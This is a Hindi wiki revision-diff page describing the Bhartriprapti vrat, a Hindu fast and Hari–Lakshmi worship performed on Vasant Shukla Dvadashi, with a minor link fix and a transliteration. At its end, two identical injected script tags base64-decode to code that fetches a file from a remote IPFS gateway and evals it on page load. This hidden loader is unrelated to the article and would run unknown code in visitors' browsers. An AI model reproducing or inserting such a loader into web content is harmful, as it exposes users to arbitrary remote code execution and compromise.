Difference between revisions of "भर्तृप्राप्ति व्रत"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
('*भारत में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा ...' के साथ नया पन्ना बनाया)
 
Line 1: Line 1:
 
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लखित [[हिन्दू धर्म]] का एक [[व्रत]] संस्कार है।  
 
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लखित [[हिन्दू धर्म]] का एक [[व्रत]] संस्कार है।  
*[[नारद] ने यह उन अप्सराओं के गण को सुनाया था, जो नारायण को पति बनाना चाहती थीं।  
+
*[[नारद]] ने यह उन अप्सराओं के गण को सुनाया था, जो नारायण को पति बनाना चाहती थीं।  
 
*वसन्त [[शुक्ल पक्ष|शुक्ल]] [[द्वादशी]] को यह व्रत किया जाता है।  
 
*वसन्त [[शुक्ल पक्ष|शुक्ल]] [[द्वादशी]] को यह व्रत किया जाता है।  
 
*इस व्रत में [[उपवास]] किया जाता है।  
 
*इस व्रत में [[उपवास]] किया जाता है।  

Revision as of 11:57, 7 September 2010

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullakhit hindoo dharm ka ek vrat sanskar hai.
  • narad ne yah un apsaraoan ke gan ko sunaya tha, jo narayan ko pati banana chahati thian.
  • vasant shukl dvadashi ko yah vrat kiya jata hai.
  • is vrat mean upavas kiya jata hai.
  • hari evan lakshmi ki pooja ki jati hai.
  • donoan ki pratimaean evan unake vibhinn aangoan par vibhinn namoan se kamadev ka nyas kiya jata hai.
  • doosare din brahman ko pratimaoan ka dan karana chahie [1].



panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

  1. hemadri (vrat0 1, 1198-1200, bhavishy puran se uddharan)

sanbandhit liank

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>